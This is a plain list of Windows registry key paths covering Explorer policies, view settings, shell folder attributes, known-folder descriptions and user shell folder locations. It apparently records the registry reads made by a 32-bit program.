HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c5-5f87-11ed-b63d-806e6f6e6963}\Data
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c5-5f87-11ed-b63d-806e6f6e6963}\Generation
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay
HKEY_CURRENT_USER\Software\Classes\Directory\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject
HKEY_CURRENT_USER\Software\Classes\Directory\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace
HKEY_CURRENT_USER\Software\Classes\Directory\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut
HKEY_CURRENT_USER\Software\Classes\Directory\AlwaysShowExt
HKEY_CURRENT_USER\Software\Classes\Directory\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\AllowFileCLSIDJunctions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{3EB685DB-65F9-4CF6-A03A-E3EF65729F3D}\InitFolderHandler
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{5E6C858F-0E22-4760-9AFE-EA3317B67173}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1381398318-3211537236-2227685884-1000\ProfileImagePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{F3CE0F7C-4901-4ACC-8648-D5D44B04EF8F}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\CallForAttributes
